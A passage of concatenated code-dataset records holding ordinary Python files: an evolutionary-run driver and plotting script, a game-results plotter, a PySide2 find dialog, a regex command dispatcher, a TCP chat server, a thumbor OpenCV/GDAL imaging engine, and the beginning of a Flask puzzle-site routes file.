    f.write('\\n'.join(paramList))\n
    f.write('\\n')\n
    f.close()\n\n
def BuildVNRArgs(exe, paramFile, cmdParams, name, data):\n
    argsList = []\n
    #exe may consist of several tokens and has to be split\n
    #e.g.: mpiexec -host node1 -np 5 ./vnr_mpi \n
    args = []\n
    args.extend(exe.split(' '))\n
    args.append('@'+paramFile)\n
    args.extend(MakeCmdParams(cmdParams))\n
    if name in axisNames.keys() and len(data) > 2:\n
        args.extend(['dummy'])\n
        for value in data:\n
            #build a one-entry dict {k:v} and let MakeCmdParams turn it into a list of parameter strings\n
            #take the first element as the parameter (the list holds exactly one element anyway)\n
            args[-1]=MakeCmdParams({name:value})[0]\n
            argsList.append(';'.join(args))\n
    else:\n
        argsList.append(';'.join(args))\n
    return argsList\n\n
#run vnr several times in a row\n
#exe -- the vnr program\n
#paramFile -- the parameter file\n
#cmdParams -- parameters passed on the command line (a dict)\n
#note: running vnr in parallel is not handled yet\n
def RunVNR(exe, paramFile, cmdParams, name, data, stats):\n
    #generate the parameter file\n
    MakeGlobalParams(paramFile)\n\n
    #1) build the dynamic parameters\n
    argsList = BuildVNRArgs(exe, paramFile, cmdParams, name, data)\n
    for args in argsList:\n
        # 2) pass the parameters and invoke the external command\n
        child = subprocess.Popen(args.split(';'))\n
        child.wait()\n
        # 3) collect the statistics of the evolutionary run\n
        # each stat is an object that must provide a statDatas(cmdParams) method\n
        for statObj in stats:\n
            statObj.statDatas(cmdParams)\n\n
#Chinese text rendering in matplotlib is not handled for now\n
#fixing it would require pointing matplotlib at a Chinese font on Linux\n
#import matplotlib as mpl\n
#mpl.rcParams['font.sans-serif']=['SimSun']\n\n
#read data from the best_xg file (default: Res/best.xg under the current directory)\n
#data format:\n
#if useTime == 0 (6 fields):\n
#generation  eval-count  best  average  stdev  fitness-distance correlation (FDC)\n
#if useTime == 1 (7 fields):\n
#generation  eval-count  elapsed-time  best  average  stdev  FDC\n
#note: the EO source was modified so that fileBestStat records FDC; with stock EO there is one field less (no trailing FDC)\n
def GetBestXgDatas(best_xg, useTime):\n
    gen = []\n
    best = []\n
    average = []\n
    stdev =[]\n
    fdc = []\n
    f = open(best_xg, 'r')\n
    for line in f:\n
        data = line.split()\n
        #each line must hold 6 fields\n
        #or 7 fields when per-generation timing is recorded\n
        #note: with stock EO subtract 1 (no trailing FDC field)\n
        best_count = 6\n
        #index of the best-fitness field\n
        best_start = 2\n
        if useTime == 1:\n
            best_count = best_count + 1\n
            best_start = best_start + 1\n
        if len(data) != best_count:\n
            continue\n
        #generation\n
        gen.append(int(data[0]))\n
        #best\n
        best.append(float(data[best_start]))\n
        #average\n
        average.append(float(data[best_start+1]))\n
        #stdev\n
        stdev.append(float(data[best_start+2]))\n
        #FDC\n
        fdc.append(float(data[best_start+3]))\n
    f.close()\n
    return gen, best, average, stdev, fdc\n\n
#read data from the vnr_xg file (default: Res/vnr.xg under the current directory)\n
#data format:\n
#generation  best-fitness  resistance-MSE\n
def GetVnrXgDatas(vnr_xg):\n
    gen = []\n
    best = []\n
    svr = []\n
    f = open(vnr_xg, 'r')\n
    for line in f:\n
        data = line.split()\n
        if len(data) != 3:\n
            continue\n
        #generation\n
        gen.append(int(data[0]))\n
        #best\n
        best.append(float(data[1]))\n
        #mean-square error of the airway resistances\n
        svr.append(float(data[2]))\n
    f.close()\n
    return gen, best, svr\n\n
#fitness statistics collector\n
#for consecutive runs, only the last generation of each run is collected\n
#for a single run, every generation is collected\n
#reads generation, best, average, stdev and FDC from the best.xg file\n
#[note]: a statDatas(self, cmdParams) method must be defined\n
class FitnessStat:\n
    def __init__(self, bContinuousRun):\n
        #generations\n
        self.gen = []\n
        #best individual fitness of each generation\n
        self.best = []\n
        #average fitness of each generation\n
        self.average = []\n
        #fitness stdev of each generation\n
        self.stdev = []\n
        #fitness-distance correlation (FDC) of each generation\n
        self.fdc = []\n
        #whether runs are consecutive\n
        #if so, only the last generation of every run is collected\n
        self.bContinuousRun = bContinuousRun\n\n
    def statDatas(self, cmdParams):\n
        #[precondition] fileBestStat must be 1,\n
        #otherwise best.xg and vnr.xg hold no data\n\n
        #path of the fitness statistics file\n
        best_xg = GetParamValue('resDir',cmdParams)+'/best.xg'\n
        #whether per-generation timing was recorded\n
        useTime = GetParamValue('useTime',cmdParams)\n
        if self.bContinuousRun:\n
            #consecutive runs: keep only the last generation\n
            cgen, cbest, caverage, cstdev, cfdc = GetBestXgDatas(best_xg, useTime)\n
            self.gen.append(cgen[-1])\n
            self.best.append(cbest[-1])\n
            self.average.append(caverage[-1])\n
            self.stdev.append(cstdev[-1])\n
            self.fdc.append(cfdc[-1])\n
        else:\n
            #a single run: collect every generation\n
            self.gen, self.best, self.average, self.stdev, self.fdc = GetBestXgDatas(best_xg, useTime)\n\n
    def getNames(self):\n
        return [\n
            axisNames['generation'],\n
            axisNames['best_fitness'],\n
            axisNames['average_fitness'],\n
            axisNames['stdev_fitness'],\n
            axisNames['fdc_fitness']\n
        ]\n\n
    def getDatas(self):\n
        return [self.gen, self.best, self.average, self.stdev, self.fdc]\n\n
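#A minimal usage sketch (hypothetical option values):\n
#  stats = [FitnessStat(True), VnrStat(True)]\n
#  RunVNR(GetExeName(), GetParamFile(), {'maxGen':100}, 'maxGen', [50,100,200], stats)\n
#  Plot(stats[0].getNames(), stats[0].getDatas(), False)\n\n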
#airway-resistance MSE statistics collector\n
#reads generation, best fitness and the resistance mean-square error from the vnr.xg file\n
#[note]: a statDatas(self, cmdParams) method must be defined\n
class VnrStat:\n
    def __init__(self, bContinuousRun):\n
        #generations\n
        self.gen = []\n
        #best individual fitness of each generation\n
        self.best = []\n
        #mean-square error between the inverted and the original airway resistances\n
        self.svr= []\n
        #whether runs are consecutive\n
        #if so, only the last generation of every run is collected\n
        self.bContinuousRun = bContinuousRun\n\n
    def statDatas(self, cmdParams):\n
        #[precondition] fileBestStat must be 1,\n
        #otherwise best.xg and vnr.xg hold no data\n\n
        #clear the data\n
        #self.gen[:]=[]\n
        #self.best[:]=[]\n
        #self.svr[:]=[]\n\n
        #data file path\n
        vnr_xg = GetParamValue('resDir',cmdParams)+'/vnr.xg'\n
        if self.bContinuousRun:\n
            #consecutive runs: keep only the last generation\n
            cgen, cbest, csvr = GetVnrXgDatas(vnr_xg)\n
            self.gen.append(cgen[-1])\n
            self.best.append(cbest[-1])\n
            self.svr.append(csvr[-1])\n
        else:\n
            #a single run: collect every generation\n
            self.gen, self.best, self.svr = GetVnrXgDatas(vnr_xg)\n\n
    def getNames(self):\n
        return [\n
            axisNames['generation'],\n
            axisNames['best_fitness'],\n
            axisNames['svr']\n
        ]\n\n
    def getDatas(self):\n
        return [self.gen, self.best, self.svr]\n\n
#subplot grid layout, chosen by the number of plots\n
#e.g. 2*2, 3*3, 4*4, 4*3 and so on\n
def CaclPlotRowColNum(n):\n
    if n == 1:\n
        #1*1\n
        return 111\n
    elif n == 2:\n
        #2*1\n
        return 211\n
    elif n == 3:\n
        #3*1\n
        return 311\n
    elif n == 4:\n
        #2*2\n
        return 221\n
    elif n == 5:\n
        #3*2\n
        return 321\n
    elif n == 6:\n
        #3*2\n
        return 321\n
    elif n == 7:\n
        #2*4\n
        return 241\n
    elif n == 8:\n
        #4*2\n
        return 421\n
    elif n == 9:\n
        #3*3\n
        return 331\n
    else:\n
        #3*3\n
        return 331\n\n
#generic plotting helper\n
#data format:\n
# names=['Generation', 'Best']\n
# datas=[[1,2,3,4], [1.2, 3, 5.6, 4.8]]\n
# if bPlotInOne == False, the figure holds several subplots with one curve each\n
# if bPlotInOne == True, the figure holds a single subplot and every curve is drawn into it\n
def Plot(names, datas, bPlotInOne):\n
    if len(names) < 2 or len(datas) < 2 or len(names) != len(datas):\n
        return\n\n
    #extract the X-axis data\n
    xname = names[0]\n
    xdata = datas[0]\n\n
    #compute the number of the first subplot\n
    plotNum = CaclPlotRowColNum(len(names)-1)\n\n
    #extract the Y-axis data and draw the curves\n
    for yname, ydata in zip(names, datas):\n
        if yname == xname:\n
            continue\n\n
        if not bPlotInOne:\n
            plt.subplot(plotNum)\n
            plotNum = plotNum + 1\n\n
        plt.plot(xdata, ydata)\n
        plt.xlabel(xname)\n\n
        if not bPlotInOne:\n
            plt.ylabel(yname)\n
        else:\n
            n = len(xdata)/2\n
            plt.text(xdata[n], ydata[n], yname)\n\n
    #plt.title('G-B Figure')\n
    #plt.axes(40,160,0,0.3)\n
    plt.grid(True)\n\n
def buildMpiExeName(hosts, np, exe):\n
    exes = ['mpiexec', '-hosts']\n
    exes.append(','.join(hosts))\n
    exes.append('-np')\n
    exes.append(str(np))\n
    exes.append(exe)\n
    return ' '.join(exes)\n
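\n#e.g. buildMpiExeName(['node1','node2'], 4, './vnr_mpi') returns the string\n
#'mpiexec -hosts node1,node2 -np 4 ./vnr_mpi'\n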
\ndef GetExeName(hosts=[], np=2):\n
    if len(hosts) == 0 or np < 2:\n
        return './vnr'\n
    else:\n
        return buildMpiExeName(hosts, np, './vnr_mpi')\n\n\n
def GetDataFile():\n
    return \"vnr_data.txt\"\n\n
def GetParamFile():\n
    return \"vnr.param\"\n\n
def GetSchema():\n
    return 'vnr_schema.xml'\n
","sub_path":"test/vnr_py/vnr.py","file_name":"vnr.py","file_ext":"py","file_size_in_byte":16265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"434027370","text":"import matplotlib.pyplot as plt\nimport glob\nimport csv\n\nFILES_LIST = ['rsel.csv', 'cel-rs.csv', '2cel-rs.csv', 'cel.csv', '2cel.csv']\nHEURISTICS_LIST = ['1-Evol-RS', '1-Coev-RS', '2-Coev-RS', '1-Coev', '2-Coev']\n\n
def str_to_float(string):\n
\ttry:\n
\t\tstring = float(string)\n
\texcept ValueError:\n
\t\tpass\n
\treturn string\n\n\n
def read_file(filename):\n
\tarr = []\n
\twith open(filename, newline='') as csvfile:\n
\t\thandler = csv.reader(csvfile, delimiter=',')\n
\t\tfor row in handler:\n
\t\t\tarr.append(row)\n
\treturn arr\n\n\n
def prepare_array(arr):\n
\tnew_arr = []\n
\tfor row in arr:\n
\t\ttemp = []\n
\t\tfor cell in row:\n
\t\t\ttemp.append(str_to_float(cell))\n
\t\tnew_arr.append(temp)\n
\treturn new_arr\n\n\n
def prepare_plot(arr, heuristic):\n
\tx, y = [], []\n
\tfor row in arr[1:]:\n
\t\tx.append(row[1])\n
\t\ty.append(sum(row[2:]) / float(len(row[2:])))\n
\tplt.plot(x, y, label=heuristic)\n\n\n
def draw_plot():\n
\tplt.xlabel('Games played')\n
\tplt.ylabel('Percentage of games won')\n
\tplt.legend(loc=4)\n
\tplt.xlim([0,500000])\n
\tplt.show()\n\n\n
def main():\n
\tfor i in range(len(FILES_LIST)):\n
\t\tprepare_plot(prepare_array(read_file(FILES_LIST[i])), HEURISTICS_LIST[i])\n
\tdraw_plot()\n\n\n
if __name__ == '__main__':\n
\tmain()\n
","sub_path":"Plots/plot1.py","file_name":"plot1.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"16036801","text":"#!/usr/bin/env python3\n# -*-coding:utf-8-*-\n\nfrom PySide2.QtWidgets import QDialog, QLabel, QLineEdit, QCheckBox, \\\n    QPushButton, QHBoxLayout, QVBoxLayout, QApplication\nfrom PySide2.QtCore import Qt, Signal, Slot\n\n\n
class FindDialog(QDialog):\n
    findNext = Signal(str, Qt.CaseSensitivity)\n
    findPrevious = Signal(str, Qt.CaseSensitivity)\n\n
    def __init__(self, parent=None):\n
        super().__init__(parent)\n
        label = QLabel(\"Find &what:\")\n
        self.lineEdit = QLineEdit()\n
        label.setBuddy(self.lineEdit)\n\n
        self.caseCheckBox = QCheckBox(\"Match &case\")\n
        self.backwardCheckBox = QCheckBox(\"Search &backward\")\n
        self.findButton = QPushButton(\"&Find\")\n
        self.findButton.setDefault(True)\n
        self.findButton.setEnabled(False)\n
        closeButton = QPushButton(\"Close\")\n\n
        self.lineEdit.textChanged.connect(self.enableFindButton)\n
        self.findButton.clicked.connect(self.findClicked)\n
        closeButton.clicked.connect(self.close)\n\n
        topLeftLayout = QHBoxLayout()\n
        topLeftLayout.addWidget(label)\n
        topLeftLayout.addWidget(self.lineEdit)\n
        leftLayout = QVBoxLayout()\n
        leftLayout.addLayout(topLeftLayout)\n
        leftLayout.addWidget(self.caseCheckBox)\n
        leftLayout.addWidget(self.backwardCheckBox)\n
        rightLayout = QVBoxLayout()\n
        rightLayout.addWidget(self.findButton)\n
        rightLayout.addWidget(closeButton)\n
        rightLayout.addStretch()\n
        mainLayout = QHBoxLayout()\n
        mainLayout.addLayout(leftLayout)\n
        mainLayout.addLayout(rightLayout)\n
        self.setLayout(mainLayout)\n\n
        self.setWindowTitle(\"Find\")\n
        self.setFixedHeight(self.sizeHint().height())\n\n
    def enableFindButton(self, text):\n
        self.findButton.setEnabled(bool(text))\n\n
    @Slot()\n
    def findClicked(self):\n
        text = self.lineEdit.text()\n
        if self.caseCheckBox.isChecked():\n
            cs = Qt.CaseSensitive\n
        else:\n
            cs = Qt.CaseInsensitive\n\n
        if self.backwardCheckBox.isChecked():\n
            self.findPrevious.emit(text, cs)\n
        else:\n
            self.findNext.emit(text, cs)\n\n\n
if __name__ == '__main__':\n
    import sys\n\n
    app = QApplication(sys.argv)\n
    findDialog = FindDialog()\n\n\n
    def find(text, cs):\n
        print('find:', text, 'cs', cs)\n\n\n
    def findp(text, cs):\n
        
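# sink for the findPrevious signal, mirroring find() above\n
        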
print('findp:', text, 'cs', cs)\n\n\n findDialog.findNext.connect(find)\n findDialog.findPrevious.connect(findp)\n findDialog.show()\n sys.exit(app.exec_())\n","sub_path":"02_signal-slot/FindDialog.py","file_name":"FindDialog.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"570714616","text":"import re\r\n\r\n#DO NOT TOUCH anything until mentioned in comments......\r\n\r\n#Replace 'line' by joining arguments(list) to String\r\n#Following are some test cases:\r\n#line = \"Betty tell me About the Weather at Faridabad\"\r\n#line = \"Betty What hello means\"\r\n#line = \"Betty What is the meaning of hello\"\r\n#line = \"Betty What is the Time\"\r\n#line = \"Betty tell me about movie Om Shanti Om\"\r\n\r\n#Following Functions are to be used to call their respective Modules\r\n\r\ndef weather():\r\n print(\"weather is called\")\r\n regex = r\"weather (of|at|in) \"\r\n if re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n location = line[match.end():]\r\n print(location)\r\n #Call Weather API here usinng location\r\n\r\n\r\ndef mean():\r\n print(\"Word mean is called\")\r\n regex = r\"mean\"\r\n if re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n i = match.start()-2\r\n while(line[i]!=\" \"):\r\n i=i-1\r\n word = line[i+1:match.start()-1]\r\n print(word)\r\n #call Meaning API here using word\r\n\r\n\r\ndef meaning():\r\n print(\"Word meaning is called\")\r\n regex = r\"meaning (of|at|in) \"\r\n if re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n word = line[match.end():]\r\n print(word)\r\n #call Meaning API here using word\r\n\r\ndef time():\r\n print(\"Time is called\")\r\n #call Time API here\r\n\r\ndef movie():\r\n print(\"Movie is called\")\r\n regex = r\" movie \"\r\n if re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n movie = line[match.end():]\r\n print(movie)\r\n #call Movie API hereusing movie\r\n \r\n\r\nMODULES = {\r\n \"weather\": weather,\r\n \"mean\":mean,\r\n \"means\":mean,\r\n \"meaning\":meaning,\r\n \"time\":time,\r\n \"movie\":movie\r\n }\r\n\r\n\r\nregex = r\"(( weather )|( meaning )|( mean)|( means)|( time)|( movie ))\"\r\nif re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n MODULES[match.group().strip().lower()]()\r\nelse:\r\n print(\"MODULE Not Found\")\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"mregex.py","file_name":"mregex.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"364934914","text":"import socket\nimport time\nhostname=socket.gethostname()\nportnumber=25000\naddress=('',portnumber)\ntcpserver=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ntcpserver.bind(address)\ntcpserver.listen(1)\ntcpclient,address=tcpserver.accept()\nprint(\"Connection established\")\nwhile(1):\n message1=tcpclient.recv(1024).decode()\n localtime = time.asctime( time.localtime(time.time()) )\n print(\"Message received from the client is:\",message1)\n print(\"Time is:\",localtime)\n msg1=input(\"Enter the message\")\n tcpclient.send(msg1.encode())\n print(\"Message send to client as a response from the server is:\",msg1)\ntcpserver.close()\n","sub_path":"code/python code to deploy in docker 
container/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"440413081","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# thumbor imaging service - opencv engine\n# https://github.com/thumbor/opencv-engine\n\n# Licensed under the MIT license:\n# http://www.opensource.org/licenses/mit-license\n# Copyright (c) 2014 globo.com timehome@corp.globo.com\n\nimport uuid\ntry:\n import cv\nexcept ImportError:\n import cv2.cv as cv\n\nfrom colour import Color\nfrom thumbor.engines import BaseEngine\nfrom pexif import JpegFile, ExifSegment\nimport cv2\nimport gdal\nimport numpy\nfrom osgeo import osr\n\n# need to monkey patch the BaseEngine.get_mimetype function to handle tiffs\n# has to be patched this way b/c called as both a classmethod and instance method internally in thumbor\nold_mime = BaseEngine.get_mimetype\n\n\ndef new_mime(buffer):\n ''' determine the mime type from the raw image data\n Args:\n buffer - raw image data\n Returns:\n mime - mime type of image\n '''\n mime = old_mime(buffer)\n # tif files start with 'II'\n if not mime and buffer.startswith('II'):\n mime = 'image/tiff'\n return mime\n\nBaseEngine.get_mimetype = staticmethod(new_mime)\n\ntry:\n from thumbor.ext.filters import _composite\n FILTERS_AVAILABLE = True\nexcept ImportError:\n FILTERS_AVAILABLE = False\n\nFORMATS = {\n '.jpg': 'JPEG',\n '.jpeg': 'JPEG',\n '.gif': 'GIF',\n '.png': 'PNG',\n '.tiff': 'TIFF',\n '.tif': 'TIFF',\n}\n\n\nclass Engine(BaseEngine):\n\n @property\n def image_depth(self):\n if self.image is None:\n return 8\n return cv.GetImage(self.image).depth\n\n @property\n def image_channels(self):\n if self.image is None:\n return 3\n return self.image.channels\n\n @classmethod\n def parse_hex_color(cls, color):\n try:\n color = Color(color).get_rgb()\n return tuple(c * 255 for c in reversed(color))\n except Exception:\n return None\n\n def gen_image(self, size, color_value):\n img0 = cv.CreateImage(size, self.image_depth, self.image_channels)\n if color_value == 'transparent':\n color = (255, 255, 255, 255)\n else:\n color = self.parse_hex_color(color_value)\n if not color:\n raise ValueError('Color %s is not valid.' % color_value)\n cv.Set(img0, color)\n return img0\n\n def read(self, extension=None, quality=None):\n if not extension and FORMATS[self.extension] == 'TIFF':\n # If the image loaded was a tiff, return the buffer created earlier.\n return self.buffer\n else:\n if quality is None:\n quality = self.context.config.QUALITY\n options = None\n extension = extension or self.extension\n\n # Check if we should write a JPEG. 
If we are allowing defaulting to jpeg\n # and if the alpha channel is all white (opaque).\n channels = None\n if getattr(self.context.request, 'default_to_jpeg', True):\n channels = cv2.split(numpy.asarray(self.image))\n if len(channels) > 3 and numpy.all(channels[3] == 255):\n extension = '.jpg'\n\n try:\n if FORMATS[extension] == 'JPEG':\n options = [cv.CV_IMWRITE_JPEG_QUALITY, quality]\n except KeyError:\n # default is JPEG so\n options = [cv.CV_IMWRITE_JPEG_QUALITY, quality]\n\n if FORMATS[extension] == 'TIFF':\n channels = channels or cv2.split(numpy.asarray(self.image))\n data = self.write_channels_to_tiff_buffer(channels)\n else:\n data = cv.EncodeImage(extension, self.image, options or []).tostring()\n\n if FORMATS[extension] == 'JPEG' and self.context.config.PRESERVE_EXIF_INFO:\n if hasattr(self, 'exif'):\n img = JpegFile.fromString(data)\n img._segments.insert(0, ExifSegment(self.exif_marker, None, self.exif, 'rw'))\n data = img.writeString()\n\n return data\n\n def create_image(self, buffer, create_alpha=True):\n self.extension = self.extension or '.tif'\n self.no_data_value = None\n # FIXME: opencv doesn't support gifs, even worse, the library\n # segfaults when trying to decoding a gif. An exception is a\n # less drastic measure.\n try:\n if FORMATS[self.extension] == 'GIF':\n raise ValueError(\"opencv doesn't support gifs\")\n except KeyError:\n pass\n\n if FORMATS[self.extension] == 'TIFF':\n self.buffer = buffer\n img0 = self.read_tiff(buffer, create_alpha)\n else:\n imagefiledata = cv.CreateMatHeader(1, len(buffer), cv.CV_8UC1)\n cv.SetData(imagefiledata, buffer, len(buffer))\n img0 = cv.DecodeImageM(imagefiledata, cv.CV_LOAD_IMAGE_UNCHANGED)\n\n if FORMATS[self.extension] == 'JPEG':\n try:\n info = JpegFile.fromString(buffer).get_exif()\n if info:\n self.exif = info.data\n self.exif_marker = info.marker\n except Exception:\n pass\n return img0\n\n def read_tiff(self, buffer, create_alpha=True):\n \"\"\" Reads image using GDAL from a buffer, and returns a CV2 image.\n \"\"\"\n mem_map_name = '/vsimem/{}'.format(uuid.uuid4().get_hex())\n gdal_img = None\n try:\n gdal.FileFromMemBuffer(mem_map_name, buffer)\n gdal_img = gdal.Open(mem_map_name)\n\n channels = [gdal_img.GetRasterBand(i).ReadAsArray() for i in range(1, gdal_img.RasterCount + 1)]\n\n if len(channels) >= 3: # opencv is bgr not rgb.\n red_channel = channels[0]\n channels[0] = channels[2]\n channels[2] = red_channel\n\n if len(channels) < 4 and create_alpha:\n self.no_data_value = gdal_img.GetRasterBand(1).GetNoDataValue()\n channels.append(numpy.float32(gdal_img.GetRasterBand(1).GetMaskBand().ReadAsArray()))\n return cv.fromarray(cv2.merge(channels))\n finally:\n gdal_img = None\n gdal.Unlink(mem_map_name) # Cleanup.\n\n def read_vsimem(self, fn):\n \"\"\"Read GDAL vsimem files\"\"\"\n vsifile = None\n try:\n vsifile = gdal.VSIFOpenL(fn, 'r')\n gdal.VSIFSeekL(vsifile, 0, 2)\n vsileng = gdal.VSIFTellL(vsifile)\n gdal.VSIFSeekL(vsifile, 0, 0)\n return gdal.VSIFReadL(1, vsileng, vsifile)\n finally:\n if vsifile:\n gdal.VSIFCloseL(vsifile)\n\n def write_channels_to_tiff_buffer(self, channels):\n mem_map_name = '/vsimem/{}.tiff'.format(uuid.uuid4().get_hex())\n driver = gdal.GetDriverByName('GTiff')\n w, h = channels[0].shape\n gdal_img = None\n try:\n if len(channels) == 1:\n # DEM Tiff (32 bit floating point single channel)\n gdal_img = driver.Create(mem_map_name, w, h, len(channels), gdal.GDT_Float32)\n outband = gdal_img.GetRasterBand(1)\n outband.WriteArray(channels[0], 0, 0)\n outband.SetNoDataValue(-32767)\n 
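# write this band's cached blocks into the in-memory dataset before releasing the reference\n
                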
outband.FlushCache()\n outband = None\n gdal_img.FlushCache()\n\n self.set_geo_info(gdal_img)\n return self.read_vsimem(mem_map_name)\n elif len(channels) == 4:\n # BGRA 8 bit unsigned int.\n gdal_img = driver.Create(mem_map_name, h, w, len(channels), gdal.GDT_Byte)\n band_order = [2, 1, 0, 3]\n img_bands = [gdal_img.GetRasterBand(i) for i in range(1, 5)]\n for outband, band_i in zip(img_bands, band_order):\n outband.WriteArray(channels[band_i], 0, 0)\n outband.SetNoDataValue(-32767)\n outband.FlushCache()\n del outband\n del img_bands\n\n self.set_geo_info(gdal_img)\n return self.read_vsimem(mem_map_name)\n finally:\n del gdal_img\n gdal.Unlink(mem_map_name) # Cleanup.\n\n def set_geo_info(self, gdal_img):\n \"\"\" Set the georeferencing information for the given gdal image.\n \"\"\"\n if hasattr(self.context.request, 'geo_info'):\n geo = self.context.request.geo_info\n gdal_img.SetGeoTransform([geo['upper_left_x'], geo['resx'], 0, geo['upper_left_y'], 0, -geo['resy']])\n\n # Set projection\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(3857)\n gdal_img.SetProjection(srs.ExportToWkt())\n gdal_img.FlushCache()\n del srs\n\n @property\n def size(self):\n return cv.GetSize(self.image)\n\n def normalize(self):\n pass\n\n def resize(self, width, height):\n thumbnail = cv.CreateImage(\n (int(round(width, 0)), int(round(height, 0))),\n self.image_depth,\n self.image_channels\n )\n cv.Resize(self.image, thumbnail, cv.CV_INTER_AREA)\n self.image = thumbnail\n\n def crop(self, left, top, right, bottom):\n new_width = right - left\n new_height = bottom - top\n cropped = cv.CreateImage(\n (new_width, new_height), self.image_depth, self.image_channels\n )\n src_region = cv.GetSubRect(self.image, (left, top, new_width, new_height))\n cv.Copy(src_region, cropped)\n\n self.image = cropped\n\n def rotate(self, degrees):\n if (degrees > 180):\n # Flip around both axes\n cv.Flip(self.image, None, -1)\n degrees = degrees - 180\n\n img = self.image\n size = cv.GetSize(img)\n\n if (degrees / 90 % 2):\n new_size = (size[1], size[0])\n center = ((size[0] - 1) * 0.5, (size[0] - 1) * 0.5)\n else:\n new_size = size\n center = ((size[0] - 1) * 0.5, (size[1] - 1) * 0.5)\n\n mapMatrix = cv.CreateMat(2, 3, cv.CV_64F)\n cv.GetRotationMatrix2D(center, degrees, 1.0, mapMatrix)\n dst = cv.CreateImage(new_size, self.image_depth, self.image_channels)\n cv.SetZero(dst)\n cv.WarpAffine(img, dst, mapMatrix)\n self.image = dst\n\n def flip_vertically(self):\n cv.Flip(self.image, None, 1)\n\n def flip_horizontally(self):\n cv.Flip(self.image, None, 0)\n\n def set_image_data(self, data):\n cv.SetData(self.image, data)\n\n def image_data_as_rgb(self, update_image=True):\n # TODO: Handle other formats\n if self.image_channels == 4:\n mode = 'BGRA'\n elif self.image_channels == 3:\n mode = 'BGR'\n else:\n mode = 'BGR'\n rgb_copy = cv.CreateImage((self.image.width, self.image.height), 8, 3)\n cv.CvtColor(self.image, rgb_copy, cv.CV_GRAY2BGR)\n self.image = rgb_copy\n return mode, self.image.tostring()\n\n def draw_rectangle(self, x, y, width, height):\n cv.Rectangle(self.image, (int(x), int(y)), (int(x + width), int(y + height)), cv.Scalar(255, 255, 255, 1.0))\n\n def convert_to_grayscale(self):\n if self.image_channels >= 3:\n # FIXME: OpenCV does not support grayscale with alpha channel?\n grayscaled = cv.CreateImage((self.image.width, self.image.height), self.image_depth, 1)\n cv.CvtColor(self.image, grayscaled, cv.CV_BGRA2GRAY)\n self.image = grayscaled\n\n def paste(self, other_engine, pos, merge=True):\n if merge and not 
FILTERS_AVAILABLE:\n raise RuntimeError(\n 'You need filters enabled to use paste with merge. Please reinstall ' +\n 'thumbor with proper compilation of its filters.')\n\n self.enable_alpha()\n other_engine.enable_alpha()\n\n sz = self.size\n other_size = other_engine.size\n\n mode, data = self.image_data_as_rgb()\n other_mode, other_data = other_engine.image_data_as_rgb()\n\n imgdata = _composite.apply(\n mode, data, sz[0], sz[1],\n other_data, other_size[0], other_size[1], pos[0], pos[1], merge)\n\n self.set_image_data(imgdata)\n\n def enable_alpha(self):\n if self.image_channels < 4:\n with_alpha = cv.CreateImage(\n (self.image.width, self.image.height), self.image_depth, 4\n )\n if self.image_channels == 3:\n cv.CvtColor(self.image, with_alpha, cv.CV_BGR2BGRA)\n else:\n cv.CvtColor(self.image, with_alpha, cv.CV_GRAY2BGRA)\n self.image = with_alpha\n","sub_path":"opencv_engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":12656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"433916811","text":"from flask import render_template, request\nimport os\nfrom json import dumps as to_json_string\nfrom datetime import datetime\nfrom uuid import UUID, uuid4\nfrom traceback import format_exc\n\nfrom application_database import *\nfrom application_utils import *\nimport application_hashes\n\n# Home page\nhost_redirect('/pages/browse.html', '/')\nhost_redirect('/pages/browse.html', '/index.html')\n\n# Short name redirects\nhost_redirect('/pages/browse.html', '/browse.html')\nhost_redirect('/pages/editor.html', '/editor.html')\nhost_redirect('/pages/test.html', '/test.html')\nhost_redirect('/pages/editor_test.html', '/editor_test.html')\nhost_redirect('/pages/validate.html', '/validate.html')\n\n# Large blocks of data\nhost_statically('data')\nhost_statically('engine')\nhost_statically('sourcemaps')\n\n# Actual page sources\nhost_statically('pages/browse.html')\nhost_statically('pages/browse.js')\nhost_statically('pages/editor.html')\nhost_statically('pages/editor.js')\nhost_statically('pages/test.html', protected=True)\nhost_statically('pages/test.js', protected=True)\nhost_statically('pages/editor_test.html', protected=True)\nhost_statically('pages/editor_test.js', protected=True)\nhost_statically('pages/validate.html')\n\ndef page_not_found(error):\n return render_template('404_generic.html'), 404\napplication.register_error_handler(404, page_not_found)\n\ndef handle_exception(exc):\n message = f'Caught a {type(exc).__name__}: {format_exc()}'\n add_feedback(message)\n return '', 500\napplication.register_error_handler(Exception, handle_exception)\n\n# Publishing puzzles\ndef publish():\n puzzle_json = request.form['puzzle']\n solution_json = request.form['solution']\n\n valid, data = validate_and_capture_image(puzzle_json, solution_json)\n if not valid:\n add_feedback(data)\n return '', 400\n else:\n display_hash = create_puzzle(puzzle_json, solution_json, data)\n return display_hash, 200\napplication.add_url_rule('/publish', 'publish', publish, methods=['POST'])\n\n# Playing published puzzles\ndef play(display_hash):\n puzzle = get_puzzle(display_hash)\n if not puzzle or not puzzle.puzzle_json:\n return render_template('404_puzzle.html', display_hash=display_hash)\n\n session_id = uuid4()\n start_session(session_id)\n return render_template('play_template.html',\n puzzle=puzzle.puzzle_json,\n display_hash=display_hash,\n session_id=session_id,\n title=puzzle.title,\n 